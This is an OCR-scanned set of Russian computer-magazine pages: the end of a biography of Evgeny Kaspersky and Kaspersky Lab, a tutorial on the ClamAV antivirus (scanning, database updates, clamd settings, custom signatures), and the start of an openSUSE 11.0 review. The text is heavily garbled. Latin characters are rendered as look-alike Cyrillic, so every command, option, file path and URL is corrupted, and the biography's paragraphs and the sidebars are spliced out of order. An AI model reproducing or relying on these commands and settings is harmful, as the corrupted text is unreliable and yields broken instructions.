архив АѴР.іір. По тестам разработка обошла всех конкурентов, обна- 
ружив наибольшее количество вирусов. Первое время Евгений никак 



» 



асперский 

сеть. Особо знаковыми моментами стали сделка с «10» в 1996 и 
договор с крупной финской компанией Р-5есиге об использовании 
ядра АѴР в их антивирусных продуктах. Примерно в этот же период 
Наталья заговорила о создании собственной фирмы и отделении 
от «КАМИ». Вначале Евгений не разделял идей жены, высказыва- 
ясь против, но когда в НТЦ все сделалось совсем уж безрадостно 
— сдался. Таким образом, 21-го июля 1997 года на свет родилось 
самостоятельное предприятие «Лаборатория Касперского». На том, 
что в названии должна использоваться фамилия нашего героя, 
настояла опять же супруга. Публика уже привыкла к АѴР как к 
продукту «Ьу Еидепе Казрегзку», — да и сам Евгений был фигурой 
широко известной. Впоследствии ход с выбором названия полно- 
стью себя оправдал. 

Возглавила новое предприятие Наталья. Она заняла пост гене- 
рального директора лаборатории, оставив непосредственно работу 
над проектом мужу. И дела пошли в гору. Уже в 99-ом открылось 
первое международное представительство компании, а доля рос- 
сийского рынка, принадлежащего «Каврегвку ЕаЬ» резко выросла 
с 5% до 50%. Сыграли роль и качество продукта, и круглосуточный 
саппорт для клиентов, что на тот момент было огромной редкостью, 
и множество других, более мелких, но важных, факторов. Бывший 
АѴР, переименованный в «Антивирус Касперского», уже ничем не 
уступал западным конкурентам. 

С наступлением третьего тысячелетия мы подобрались к «новей- 
шей истории» ЗАО «Казрегзку Баб». Сфера деятельности компании 
давно расширилась и теперь охватывает не только персоналки, 
но и рабочие станции, файловые и почтовые сервера под прак- 
тически любыми ОС, КПК и т.д. «Антивирус Касперского» совер- 
шил гигантский скачок, за несколько лет из категории «один из 
многих» перейдя в категорию мировых лидеров. Нюансы работы 



«Касперский продолжает заниматься любимым делом, 
изучая вирусы и храня покой наших компов. Сегодня 
он без тени преувеличения является одной из самых 
весомых и значимых фигур в своей области» 



не мог взять в толк, о каком еще АѴР ему пишут хвалебные мейлы. 
Лишь потом он заметил досадную опечатку, но менять что-либо было 
поздно — программа уже получила известность под «ошибочным» 
именем. 

В том же 94-м, после триумфа в Гамбурге, появились и первые 
контракты. Сразу, с места в карьер, зарубежные — с Италией и 
Швейцарией. Продавался АѴР и через сам НТЦ «КАМИ», но прода- 
жи были просто смешными (не говоря уже о вырученных деньгах). В 
1994-м же году к работе мужа присоединилась Наталья Касперская, 
сначала поработав в магазине «КАМИ», а потом — перейдя в сам 
антивирусный отдел, в роли менеджера. На нее возложили практи- 
чески главную на тот момент задачу — наладить сбыт продукта. 

На руинах того, что еще совсем недавно было Советским Союзом, 
было сложно заниматься бизнесом, а уж ІТ-бизнесом и подавно. 
Дела у «КАМИ» шли не лучшим образом, в то время как отдел 
Евгения мало-помалу обрастал серьезными договорами и контрак- 
тами. Методом проб и ошибок стала выстраиваться партнерская 



«Лаборатории Касперского» вполне достойны отдельной статьи, но 
краеугольной фигурой здесь все же выступает «лицо и имя» дан- 
ного бренда. Сам Евгений за эти годы успел развестись с женой 
и впоследствии сменить ее на посту генерального директора. 
Наталья тоже продолжает работать в компании, но теперь в качест- 
ве председателя Совета директоров. Все перестановки произошли 
совсем недавно, в 2007 году, и оба склонны согласиться с тем, что 
совместная работа не очень хорошо повлияла на семейные отно- 
шения. 

Касперский продолжает заниматься любимым делом, изучая вирусы 
и храня покой наших компов. Сегодня он без тени преувеличения 
является одной из самых весомых и значимых фигур в своей облас- 
ти. Слово «эксперт» более чем уместно! 

Вместо какого-то заключения хочется заметить, что у этой истории 
нет финала, потому что в данный момент она продолжает активно 
развиваться. Мы имеем прекрасную возможность наблюдать за 
всем этим «из первых рядов», т 
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СІ.АМАѴ: ИЗУЧАЕМ ВОЗМОЖНОСТИ СВОБОДНОГО АНТИВИРУСА 



Появление в начале века нового проекта, предлагающего антивирус с от- 
крытыми исходными текстами под лицензией СЫІІ ОРЬ, вызвало единодуш- 
ное одобрение со стороны пользователей и администраторов. А сегодня, 
Щя; по многочисленным рейтингам и обзорам, СІатАѴ является самым 
популярным ОрепЗоигсе решением. 



В ЧТО УМЕЕТ ЛЕЧЕБНЫЙ МОЛЛЮСК 

Разработчики СІатАѴ поставили себе целью разработать программу, про- 
веряющую вложения на наличие вирусов, —такую, чтобы можно было бы 
легко интегрироватьс максимально большим количеством почтовых серве- 
ров, работающих под *піх. С ростом популярности антивирус оброс новыми 
возможностями, а за счет использования общедоступных библиотек появи- 
лись сторонние решения, позволяющие сканировать контент на файловых 
серверах, трафик, проходящий через прокси, данные, передаваемые по 
определенному протоколу (зпогНпІіпе), а также совместно работать со 
всеми популярными почтовыми клиентами. 

Большая часть пакета антивирусного ПО написана на Си. Изначально вы- 
бран курс на совместимость со спецификацией Р05ІХ, что позволяетскомпи- 
лировать и использовать СІатАѴ на разных операционных системах: Бі п их, 
Зоіагіз, *В5й, ОрепВЗй, ЫеіВЗО, Мае 05Х, Ве05, ѴѴІпсІоѵѵз/Судѵѵіп и других. 
Постепенно антивирус научился проверять почтовые ящики (тЬох и 
Маіісііг), архивы и исполняемые файлы, упакованные специальными 
программами. Сегодня поддерживаются основныетипы архивов (ПАР, 2 ір, 
б^ір, Вгір2, СаЬіпеі) и такие форматы сжатия РогіаЫе ЕхесіЛаЫе, какІІРХ, 
Р56 и Реіііе. Последние версии СІатАѴ умеют определять и блокировать 
фишинг-сообщения, полученные по электронной почте, сложные таіѵѵаге 
и эксплоиты в некоторыхтипахфайлов. В базу занесено почти ЗООтысяч 



сигнатур. Много это или мало — сказать трудно, ведь сигнатуры можно 
считать по-разному. 

Изначально СІатАѴ— именно сканер. В нем отсутствует функция мони- 
тора, то есть возможность проверки файлов по запросу (оп-бетапсі). При 
проверке почты или ѵѵеЬ-трафика такой подход неприемлем. Поэтому для 
выполнения проверки «на лету» в І_іпих и РгееВЗй следует использовать 
драйвер йагико [ багико.бпзаІіаз.ога/ѵѵікі/іпбех.рІлр/Маіп Раде ), кото- 
рый первоначально был разработан Аѵіга ѲтЬН для своего антивируса, 
а сейчас используется, чтобы предоставить сторонним программам 
возможность доступа кфайловой системе. Другой вариант — организовать 
подобное сканирование при помощи СІатРБ [ сІатБ.зкпеі ]. 

Перед тем, как перейти кболее близкомузнакомству, следует отметить, что 
сСІатАѴ не все бывает гладко. Так, поиск по сайту ѵѵѵѵѵѵ.зесигіМаЬ.ги пока- 
зывает, что в разное время было найдено 35 уязвимостей, часть из которых 
относится квесьма серьезным. Кчести разработчиков, найденные ошибки 
быстро устраняются. Просто не забывай обновлять СІатАѴ, и он не станет 
источником проблем. 

Н УТИЛИТЫ СІ.АМАѴ 

В состав антивируса входит несколько утилит, включая гибкий и масшта- 
бируемый многопоточный демон, сканер командной строки и продвинутый 
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Сканируем каталог на вирусы 



Получаем Ьех-дамп при помощи відіооі 



инструмент для автоматических обновлений баз данных. Для 
установки и обновления утилитантивируса разработчики 
рекомендуют использовать репозитарии пакетов. В ОеЬіап/ 
ІІЬипіи для поиска нужных приложений используем команду: 

$ зисіо арС-сасЬе зеагск сіатаѵ 

И ставим основной набор: 

$ зисіо арС-деС іпзСаІІ сіатаѵ 

В процессе инсталляции будет создан системный пользова- 
тель и группа сіатаѵ. Теперь стало возможным проверять фай- 
лы. СІатАѴ предлагает несколько вариантов. Самый простой 
— использование утилиты сіатвсап. В архиве антивируса, в 
подкаталоге іезі, есть несколько тестовых вирусов, при помо- 
щи которых можно проверить работу СІатАѴ. Если вызвать 
сіатвсап без параметров, будет проверен текущий каталог. 
Такой режим позволяет оценить работу утилиты с различными 
типами файлов, чтобы определиться с ее возможностями на 
начальном этапе. Затем лучше добавить параметр ' -і 1 для 
вывода только зараженных файлов: 

$ сіатзсап -і 

/Тюте/ зЬоЬег/ѵігиз/КІТ . ЕХЕ : КіТ.1 РОШГО 
/Тюте/зЬоЬег/ѵігиз/ Ц ! СТ-С . СОМ: СарТаіпТгірз 
РОШБ 

- ЗСАБ ЗБММАКУ 

Кпоѵпі ѵігизез : 295018 
Епдіпе ѵегзіоп : 0.92.1 
Зсаппесі сіігескогіез : 1 
Зсаппесі Тііез : 3732 
ІпТесТесі Тііез: 3691 
Бака зсаппесі: 3.22 МВ 
Тіте : 40.905 зес (0 т 40 з) 

Для звукового оповещения о найденном вирусе воспользуйся 
опцией «--Ъеіі». 

Кстати, никто не мешает поступить итак: 

$ саТ СК.СОМ | сіатзсап - 
зТсііп : Ск РОШБ 

Проверитьлюбой другой каталог(при наличии прав) можно, 



просто указав путь к нему в строке запуска. По умолчанию 
подкаталоги не проверяются, но этого легко добиться за счет 
параметра ' -г ' , разрешающего рекурсивный обход: 

$ сіатзсап -г -і ~/зо1Т 

Также полезными могут оказаться опции «-ехс1и<іе=путь» и 
«-іпс1ис1е=путь». Первая позволяетуказать шаблоны фай- 
лов, которые нужно исключить из поиска, а вторая, наоборот, 
только те, которые нужно сканировать при поиске вирусов. 
Поумолчанию глубина рекурсии для каталога составляет 15, для 
файлов архива — 8. Такое ограничение установлено для того, 
чтобы избежать ОоЗ-атак. Но его можно изменить при помощи 
параметров «--тах-гесигзіоп» (для архивов), «--тах-сііг- 
гесигзіоп» (каталоги) и «--тах-таіі-гесигзіоп» (е-таіі). 

В обычном режиме программа просто сообщаето найденном 
вирусе. Используя дополнительные ключи, можно выполнить 
следующие действия: удалить вирус (--гетоѵе), переместить 
(--тоѵе=путь) или скопировать (--сору=путь) файлы в 
другой каталог. 

При работе утилита «молчалива». Это очень неудобно при за- 
пуске через сгоп. Но ничего страшного: опция «--1од=куда» 
заведетжурнал событий. 

Если ты создал свою антивирусную базу (об этом чуть ниже), 
указать на нее можно с помощью «--сіаСаЬазе». Пара- 
метрову сіатвсап много; за подробностями обращайся к 
сіатзсап (1) .Добавляя ключи, можно помечать вирусы 
и блокировать битые исполняемые файлы (--сіекеск- 
Ьгокеп), обычные (--Ыоск-тах), зашифрованные архивы 
(--Ыоск-епсгуркей) и многое другое. 

г ОБНОВЛЕНИЕ БАЗ 

Для обновления антивирусных баз разработчиками предлага- 
ется утилита {гевЬсІат. Она идет в отдельном пакете сіатаѵ- 
Ігевбсіат, но обычно указана в зависимостях основных паке- 
тов сіатаѵ. Обновление можно производить в двух режимах: 
интерактивном, запуская ее в строке терминала, — и какдемон. 
Утилита для автоматического выбора зеркала использует базу 
іаіаЬаве.сІатаѵ.пеІ . Затем производится попытка соединить- 
ся с первым зеркалом в списке (в случае неудачи — со следую- 
щим). Вначале необходимо за пустить утилиту без параметров: 

$ зисіо Ігезксіат 

Если все нормально, в дальнейшем для запуска ^гезИсІат и 
ежедневного обновления можно использовать сгоп: 




> ѵѵагпіпд 

Чтобы установить мо- 
дуль йагико в ІІЬипІи 
8.04, придется пере- 
собрать ядро, включив 
СараЬІІІІіев 
в виде модуля. 




> Ііпкз 

• Об установке СІатАѴ 
на ОрепВЗО можно 
прочитать в пошаго- 
вом руководстве: ѵѵѵѵѵѵ. 
орепбзсі.ги/сіосв/ 
вІерв/сІатаѵ.ЫтІ . 

• Полный список 
интересных проектов, 
связанных с СІатАѴ, 
насчитывает десятки 
приложений, его мож- 
но найти на странице 
Ооѵѵпіоасі ТИігсІ 
рагіу іюоіб официаль- 
ного сайта проекта 
ѵѵѵѵѵѵ.сіатаѵ.пеі . 
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Проверить подозрительный файл на вирус можно при помощи одного из 
онлайн-сервисов 

$ зисіо сгопкаЪ -е 

О 0 0 * * * /изг/1оса1/Ъіп/кгезкс1ат --диіек \ 

-1 /ѵаг/іод/сіат-ирсіаке . Іод 

Как вариант: запускать ее в режиме демона. Для этого лишь следует доба- 
вить параметр 1 -б' : 

$ зисіо кгезксіат -сі -с 2 -1 /ѵаг/іод/сіат-ирбаке . Іод 

Параметр '-с ' указываетна количество обновлений в день (число от 1 
до 50). При необходимости в строке запуска можно указать прокси и другие 
параметры. Какправило, в пакеты майнтайнеры добавляютсвои скрипты 
для запуска ітезЬсІат. В ІІЬііпІи для запуска демона достаточно выполнить 
команду: 

$ зисіо /екс/іпік . б/сіатаѵ- кгезксіат зкагк 

При загрузке ітезбсіат считывает параметры из файла /екс/сіатаѵ/ 
кгезксіат. сопк, которые можно переопределить в строке запуска. За 
количество обновлений вденьотвечаетпараметр Скескз . Например, 
чтобы обновлять базу каждый час, пишем: 

Скескз 24 

г МОЛЛЮСКОВЫЙ ДЕМОН 

Вводить каждый раз параметры неудобно, да и не нужно. При больших 
объемах проверяемых данных разработчики предлагают использовать 
многопоточный демон сіатсі. В отличие отсканера, демон загружает все 
необходимые базы и настройки один раз при старте, а затем постоянно на- 
ходится в полной боевой готовности. В ІІЬипІи он входит в отдельный пакет: 

$ зисіо арк-дек іпзкаіі сіашаѵ-сіаетоп 

Демон загрузится и будет ожидать запросы. Если установка производилась 
из сырцов, то сіатсі при первом запуске работать откажется: 

$ зисіо /изг/1оса1/зЬіп/с1атсі 

ЕККОК: Ріеазе ебік Оке ехатріе сопкід кііе /екс/сіатаѵ/ 
сіатсі. сопк 

ЕККОК: Сап' к рагзе кке сопкід кііе /екс/сіатаѵ/сіатсі. 
сопк 

Поэтому сразу после установки пакета нужно убрать или закомментировать 
строку Ехатріе в самом начале /екс/сіатаѵ/сіатсі. сопк. 

Анализ конфига не всегда дает представление обо всех настройках. 
Например, установки по умолчанию в файле могут быть опущены. Чтобы 




Команда сіатсопі выдаст всю инфу по настройкам СІатАѴ 

узнать действующие настройки, необходимо за юзать утилиту сіатсопк. 
При запуске без параметров она выведет все настройки из файлов сіатсі. 
сопк, кгезксіат. сопк, втом числе иустановки поумолчанию (если не 
применять«--поп-бекаи1к»), атакже используемую версию антивирус- 
ных баз. 

Не всегда установки в сіатсі. сопк оптимальны! В зависимости от 
назначения компьютера их следует пересмотреть и скорректировать, 
чтобы не удивляться потом, что зашифрованные архивы не получа- 
ется скачать с файлового сервера или получить по почте. Обо всех 
параметрах рассказывать не буду, — их слишком много, ктому же, 
назначение части изнихочевидноитак. Остановлюсь только на са- 
мых важных. Демон может работать в сетевом или локальном режиме. 
В целях безопасности для проверки рекомендуется использовать 
локальный сокет: 

ЬосаІЗоскек /ѵаг/гип/сіатаѵ/сіатсі. скі 
ЕіхЗкаІеЗоскек кгие 

Хотя для некоторых программ сіатсі придется подвешивать на сетевой 
интерфейс (в данном случае — интерфейс обратной петли): 

ТСРЗоскек 3310 
ТСРАскіг 127.0.0.1 
МахСоппескіопОиеиеЕепдкк 30 

Месторасположение антивирусных баз указывается при помощи 
ВаІаЬавеОігесІогу: 

БакаЬазеБігескогу /ѵаг/1іЬ/с1атаѵ 

Чтобы подключить сіатсі кСІатико (интерфейс кОа^ико) для оп-бетапб 
сканирования, добавляем следующие строки: 

$ 51Ю0 ѴІМ /ЕТС/СЬАМАУ/СЬАМО.СОМР 

СІатикоЗсапОпАссезз уез 

# Выбираем, в каких случаях проверять файл 
СІатикоЗсапОпОреп уез 
СІатикоЗсапОпСІозе уез 
СІатикоЗсапОпЕхес уез 

# Данные каталоги будут проходить проверку 
СІатикоІпсІибеРакк /коте 
СІатикоІпсІибеРакк /ѵаг/ ккр/иріоаб 

# Данные каталоги будут исключены из проверки 
СІатикоЕхсІибеРакк /коте/ гЬоЬег/ . ззк 

# Максимальный размер проверяемого файла (0 — без лимита. 
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5 Мб — по умолчанию) 

СІашикоМахРіІеЗіге 5 ОМ 

Чтобы заставить демона работать, пошли ему сигнал или используй 
утилиту сіатсізсап. Достаточно указать на каталог или файл, который 
нужно проверить: 

$ сіатсізсап ~/зо6б 

При необходимости можно переопределить режим работы демона для кон- 
кретной задачи, указавтребуемые параметры в строке запуска сіатсізсап. 

Н ПРАВИМ БАЗЫ 

В СІатАѴ есть возможности, отсутствующие в других антивирусах: до- 
бавление собственной сигнатуры и правка СѴО (СІатАѴ Ѵігиз йаІюЬазе) 
баз. Для этого в комплекте поставляется специальная утилита зідіооі. 
Конечно, обычному юзеру не дело заниматься созданием сигнатур, но 
зато ты не останешься одиннаодинс вирусами во время очередной 
эпидемии. И получишь неплохую практику. В архиве исходныхтекстов 
находится документ«СгеаІіпд зідпаіигез Іог СІатАѴ», в котором 
описано, как получить сигнатуру из тестовых «вирусов», поставляемых 
вместе с СІатАѴ. 

Мне повезло: в коллекции нашелся вирус, который не распознавался 
СІатАѴ. Анализ файла при помощи онлайн-сервиса Ѵігизіоіаі (уууууу, 
ѵігизіоіаі.сот/ги ] показал, что о нем «знают» 1 7 из 32 антивирусов. Что ин- 
тересно, первый анализ этого файла на ресурсе датирован еще 2006 годом. 
Антивирус Аѵазі назвал его «ѴѴІп32:Тгоіап-деп», АѴ6 — «ІРС/ВаскОоог. 
ЗбВоіЗ.ВОѴѴ». Кстати, Касперский и Ог.ѴѴеЬ молчат, как рыбы; интересно 
узнать, почему. 

Самый простой способ создать сигнатуру — записать его М05-сумму: 

$ зідбооі --тс15 безб.ехе > безб.ксІЪ 
Смотрим, ЧТО Внутри: 

$ саб безб . бкіЬ 

абсЬе94б8ЬЬа150 083653 642 94е15бба: 64000 ібезб.ехе 

Теперь проверяем, подключив новую базу: 

$ сіатзсап -6 безб.МЪ безб.ехе 
безб.ехе: безб . ехе РОІЖБ 

Вирус определился, но стоит ему только заразить другой файл, как 
схема будет неэффективна. В этом случае необходимо сохранить в базу 
специфическую часть. Чтобы получить дамп, нужно добавить параметр 
«--Ьех-бшпр». 

$ саб безб.ехе I зідбооі --Ъех-бштѵр > ѵігиз. зід 

Либо воспользоваться любым другим редактором или приложением. 
Например, подойдет и файловый менеджер МібпідЫ Соттапег. Авторы 
некоторых вирусов оставляют комментарии, которые можно найти при 
помощи штатной утилиты зігіпд, а потом перевести в Ьех. Запись в базе 
вирусов СІатАѴ в самом простом случае выглядит так: 

Имя виру са=Нех- сигнатура 

Этот метод работает на ура. Можно создать свою базу или занести новые 
сигнатуры в базу данных баііу. 

В СІатАѴ используются две базы: постоянная (гпаіп) и для ежедневных 
обновлений (баііу). Их расположение можноузнать из переменной 
БабаЬазеБігесбогу. В пакетах из репозитария эти базы, как правило, 
находятся в распакованном виде (в ІІЬипіш — /ѵаг/1іЬ/с1атаѵ]. В 
архиве исходныхтекстов они поставляются в упакованном виде (фай- 
лы с расширением сѵб). После установки их можно найти в каталоге 



Сборка пакета 
в ОеЪіап/бГЬипш 

Иногда приходится прибегать к установке из исходных текстов. 
Например, когда в репозитарии находится старая версия, не имеющая 
некоторого функционала или содержащая уязвимости. Также при 
запуске некоторые утилиты могут жаловаться на то, что «Уоиг СІатАѴ 
іпзтііайоп із 017ГОАТЕЗ». Лучшим выходом из такой ситуации будет 
самостоятельная сборка пакета. В ВеЪіап/ІіЪипт сделать это доволь- 
но просто. Сначала скачиваем библиотеки и утилиты для компиляции 
СІатАѴ: 

$ зисіо арб-деб Ъиіісі-сіер сіатаѵ 

И программы для сборки пакета: 

$ зисіо арб-деб іпзбаіі бакегооб сШ-таке 

Получаем с сайта проекта последнюю версию СІатАѴ, распаковыва- 
ем, заходим внутрь каталога и даем команду: 

$ сПт_таке -сгеабеогід 

На запрос о типе пакета нажимаем < $ > (зіп^іе), затем подтверждаем 
параметры, нажав <Епі:ег> . Теперь собираем пакет: 

$ 6ркд-Ъиі1сІраскаде -гбакегооб -6 

После сборки устанавливаем пакет при помощи брк§. 



/изг/зкаге/ сіатаѵ. Для распаковки баз используется зідіооі с ключом 
«— ипраск»: 

$ зідбооі --ипраск=6аі1у . сѵб 

После чего втекущем каталоге появится несколько файлов. Если открыть 
любой в текстовом редакторе, то можно увидеть, что он состоит из строк 
«имя:хэш». Добавляем в одну из них сигнатуру и просчитываем новую 
контрольную сумму измененного файла: 

$ саб ѵігиз. зід » баіІу.сІЪ 
$ тсІБзит баіІу.бЬ » баііу.іпбо 

После чего правим баііу . іпбо, чтобы запись выглядела так: 

баііу . 6Ь: е82аа698а151е242ааее0е663с36бе85 

Не забудь удалить предыдущую запись. Теперь можно пользоваться обнов- 
ленной базой. 

^ЗАКЛЮЧЕНИЕ 

Для удобства пользователей разработано несколько неплохих фронт-эн- 
дов. Самый известный из них — КІатАѴ ( кіатаѵ.збпеі ). построенный на 0Т- 
библиотеках и предназначенный для работы в среде КйЕ. Поддерживается 
«оп ассезз» и ручной режим сканирования, обновление антивирусных баз, 
карантин, просмотр почты для КМаіІ и Хітіап ЕѵоІіЛіоп. Сіатакйоп [ ѵѵеЬ. 
бзсаіі.к/гозроіозсо/сіатакбоп ] позволяет пользователям КИЕ 3.1 и старше 
проверять файлы и каталоги при помощи контекстного меню. 

Надеюсь, теперь проблем с проверкой файлов на вирусы в *піхутебя не будет. ИНИ 
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ДИСТРИБУТИВ ОРЕЫБІІБЕ 11.0: КРАСИВЫЙ СНАРУЖИ, НАДЕЖНЫЙ ВНУТРИ 




Среди большого количества дистрибутивов есть решения, являющиеся 



своего рода эталонами — столпами, на которых стоит СЕІЦ/Ілпііх. 



По ним определяют стандарты и пути развития, а их разработчикам 



прощают мелкие ошибки и недочеты. Недавно вышедший орепЗИЗЕ 11.0 
как раз и относится к таким дистрибутивам. 



ногие воспринимают орепЗІІЗЕ как Еебога в зеленой окраске, 
но различий между ними гораздо больше, чем сходств. 

Н ТВОЙ ГРОЗНЫЙ ИНСТРУМЕНТУСТАНОВКИ 

Дистрибутив обладаеттремя отличительными особенностями. Бла- 
годаря корням Біаскѵѵаге (от которого он сейчасушел очень далеко), 
для установки приложений используется РебНаСовский РРМ. Другая 
черта — обширный набор драйверов, что называется, «из коробки». 
Венчает список особенностей мощная программа настройки Уа5Т — Ѵе* 
апоІЬег Беіир Тооі («Еще одно средство установки»). Правда, ныне она 
преподносится как Ѵоиг аѵѵезоте 5е*ир Тооі («Твой грозный инстру- 
мент установки»), Связано это с тем, что поначалу Уа5Т был именно 
инструментом для установки дистрибутива, а сейчас — обеспечивает не 
только установку, ной централизованную настройку всего и вся. Уа5Т по 
праву признан одним из самых простых и функциональных приложений, 
используемых для настройки Еіпих-систем. В состав Уа5Т2 (создан в 
ноябре 1 999 года) включено около сотни модулей, предназначенных для 



изменения параметров различных подсистем ( еп.орепзизе.огд/УаБТ/ 
Мобиіез ). 

Первый Уа5Т был написан одним из основателей 51І5Е, Томасом Фером, на 
С++ с использованием библиотеки псигзез. Современный Уа5Т обладает 
еще и СИ:/61:к+ интерфейсами. Таким образом, Уа5Т можно запускать как из 
Х-ѴѴІпбоѵѵ,таки в консоли. Вариант Ѳік+ появился в 2007 году в версии 10.3. 
А в 1 1 .0 вариант для КБ Е, как и многие другие приложения орепЗІІЗЕ, был 
перенесен на библиотеку 014. Последняя, помимо прочих возможностей, 
позволяет использовать С55 для декорирования интерфейса. 

Н ПОСТАВКАДИСТРИБУТИВА 

Последние релизы 51І5Е Ыпих и первые орепЗІІБЕ предлагались в 
весьма оснащенной комплектации на 5 СБ дисках. Чуть позже появился 
и БУй-вариант. Но начиная с версии 10.3, поставка изменилась. Сегодня 
на странице для закачки ( зойѵѵаге.орепзизе.огд ) доступны только БУй- и 
иѵеСй-версии. Кроме ознакомления с дистрибутивом и тестирования 
оборудования, второй вариант позволяетустановить систему на диск. 

Для установки по Сети с НТТР, ЕТР, N Р5, 5МВ или жесткого диска можно 
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> ѵѵагпіпд 

При создании файло- 
вой системы средст- 
вами Уа5Т размер 
іпосіе в ехіЗ увеличен 
со 1 28 (используется 
по умолчанию) до 256. 
Это может вызвать 
сбой в работе утилит, 
предназначенных для 
доступа к разделам 
І_іпих из ѴѴІпбоѵѵв, 
вроде ЕХТ2 ІР5 (уууууу, 
^в-сігіѵег.огд ). 



> ѵісіео 

На прилагаемом 
кжурналу диске 
ты найдешь видеоро- 
лик, в котором показа- 
но, какустановить 
и произвести конфигу- 
рирование орепЭІІЗЕ 
11 . 0 . 



использовать вариант Меіѵѵогк Міпі-СО размером 71 Мб (как 
написано на сайте, «Ехрегіепсеб Іівегвопіу»), В его состав 
входит л ишь минимальный набор, позволяющий запустить 
систему и начать установку. При загрузке ЫѵеСО-варианта 
следует выбрать версию с ОМОМ Е 2.22.2, либо КОЕ 4.0.4. 
Наличие последнего неудивительно, поскольку сразу после 
анонса КйЕ 4 в Сети уже был доступен ознакомительный диск 
этого окружения именно с орепЭІІЭЕ. 

В отдельном образе Ехіга Еапдиадев собраны пакеты для 
локализации интерфейса. Не стоит, наверное, при наличии 
выхода в интер нет тянуть дополнительно 600 Мб ради несколь- 
ких пакетов. Проще доустановить все, что нужно, уже в рабо- 
чей системе. Тем более, при выборе русского языка интерфейс 
основных программ настройки локализован. 

Поддерживаются архитектуры І586, х86_64 и Роѵѵег РС. 
Закачать можно кактрадиционно с НТТР/РТР, так и через 
ВкТоггепЕ 

Разработчики предлагаюттакже и коробочную версию, состо- 
ящую из ОѴй + Сй. Цена для нашего пользователя не велика 



и составляет$15, но, ксожалению, в списке поставки нет 
упоминания ни о какой документации (именно она является 
изюминкой дистрибутивов 51І5Е). 

г ЧТО НОВОГО В 11.0? 

В отличие от версии 1 0.3, разработка которой затянулась 
почти на год, 1 1 .0 появилась в срок (ровно через 8 месяцев). 

По сравнению с последней бетой, в РС1 былоустранено -500 
ошибок и еще десяток исправили прямо перед релизом. Рабо- 
та, сучетом перехода на 01:4, была проделана огромная. Всего 
заявлено 200 различныхулучшений и доработок. Отрадно, что 
к релизу была подготовлена русскоязычная документация, 
позволяющая ознакомиться с основными нововведениями 
( ги.орепвиве.огд/1 1 .0 ). 

Под капотом орепЗІІЗЕ находится ядро 2.6.25.5, ѲІІЬс 2.8, ОСС 
4.3, СМаке 2.6, Х.Огд 7.3, О-Виз 1. 2.1, АррАгтог 2.3, Хеп 3.2.1 
РС1 , Регі 5.10. 

Еслитеатр начинается с вешалки, то дистр — сустановки. 
Инсталлятор полностью переработан и стал более простым и 
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• Советы по на- 
стройке внешнего 
вида УаБТ доступны 
тут — еп.орепвиве. 
огд/УаБТ/Тірв . 

• Сайт проекта 
орепБІІБЕ, откуда 
можно скачать дист- 
рибутив, находится по 
адресу ги.орепвиве. 
ого . 

• Сервис орепБІІБЕ 
ВиіШБегѵісе 

[ орепзизе.огд/ВиіІсІ 
Бегѵісе ) предостав- 
ляет инструменты 
для сбора пакетов 
орепБІІБЕ, ББЕ, 
ОеЬіап, ІІЬипІи, 
Мапбгіѵа, РНЕЦ 
Еебога и СепЮБ. 








"Программа установки в КОЕ 



удобным. Некоторые шаги убраны или сокращены, итеперь 
установку можно произвести буквально за семь щелчков 
мыши. Это — без учета ручного создания разделов. Хотя мас- 
тер неплохо справляется с автоматическим разбиением диска 
(2хОЗУ под зѵѵар, из остального — 60% под/ и 40% — /боте). 
Программы установки в КОЕ и ѲКІОМЕ несколько отличаются, 
но основные пункты, конечноже, совпадают. В ЫѵеСО-вари- 
антах дистрибутива при выборе русского ничего не происхо- 
дит; программа продолжает общаться на английском. 

Время развертывания системы сократилось примерно в два 
раза, итеперь весь процессзанимаетоколо 20 минут. Уско- 
рениеустановки вызванотем, что базовая система ставится 
из образа, а не из отдельных пакетов. В РРМ теперь вместо 
Ьгір2 применен алгоритм БЕМА, поэтому размер пакетов стал 
меньше (сопутствующий плюс — в образ помещается больше 
программ), а время и затраты на распаковку сократились. 

При создании файловой системы средствами УаБТ размер 
іпобе в ехіЗ увеличен со 128 (используется поумолчанию) до 



Установка орепЗІІЗЕ 

Хотя интерфейс инсталлятора не локализован, процесс установки дистрибутива 
достаточно прост. На первом шаге выбираем клавиатурную раскладку. В этом же 
окне подтверждаем согласие с лицензией Ноѵеіі. Далее — указываем часовой пояс 
(в ЮЗЕ-варианте — с картой) и создаем разделы для установки системы. Разметка 
немного отличается от других дистрибутивов. Можно определить, будет ли это обыч- 
ный раздел или ЬѴМ, и поручить программе автоматически создать все остальное. 
При выборе СгеаЩ Рагйгіоп БеШр диск доступен для ручной разметки. Есть вариант 
создать зоЙчКАГО или разместить систему на шифрованном разделе. Поддерживают- 
ся все популярные файловые системы: ехЕѴЗ, КеізегЕБ, ХЕБ и ЭЕЗ. Следующий шаг 
— создание пользователя для повседневной работы. Обрати внимание на флажок 
«Юзе гЫз раззѵѵогсі бог зузгет асітіпізггагог». По умолчанию он установлен. Это значит, 
что учетная запись гооі: не будет создана в системе и для повышения привилегий 
необходимо использовать зибо (как в ІіЬипШ) . Но если нужен гооі:, — сними этот 
флажок. Теперь смотрим результат, и, если все устраивает, нажимаем Іпзіаіі. 



256. Это может вызвать сбой в работе утилит, предназначен- 
ных для доступа к разделам Ыпих из ѴѴІпсІоѵѵв, вроде ЕХТ2 ІР5 
( ѵѵѵѵѵѵів-сігіѵег.огд ). 

Установка пакетов в орепБІІБЕ всегда вызывала легкое 
раздражение своей медлительностью. В 1 0.3 была проделана 
кропотливая работа над ошибками, и в 1 1 .0 система управле- 
ния пакетами и библиотека ІІЬЕУрр подверглись дальнейшим 
усовершенствованиям. Так, вместо формата РРМ -МО (VII М), 
в котором метаданныехранились вХМЦ теперь используется 
БОБУ, реализованный в виде словаря. Такой форматболее 
удобен для парсинга, поэтому скорость обработки метаданных 
увеличилась. Для разрешения проблем с зависимостями 
используется более быстрый 5а1_воІѵег (БабвбаЬІІІІу Боіѵег). 
Консольный менеджер пакетов гуррегстал поддерживать 
регулярные выражения при задании имен пакетов. Теперь, 
чтобы установить пакеты локализации для КОЕ, не нужно 
долго искать их названия, достаточно ввести: 

# гуррег іпзОаІІ 'кс!е*ги' 

Оченьудобно! Хотя, если сравнить с выводом команды «зисіо 
арЦ-сасйе зеагсЪ. ксіе I дгер ги» (в ІІЬііпІи), то можно 
увидеть, сколько лишнего будет установлен о таким образом. 
Сами пакеты можно накатывать какс локального диска, так 
и с НТТР/ЕТР-ресурсов. В последнем случае после загруз- 
ки гуррег постарается самостоятельно решить проблемы с 
зависимостями. Для развертывания системы в минимальной 
конфигурации (например, на флешку) движок управления 
пакетами ЕУрр стал поддерживать политику -побоев, отключа- 
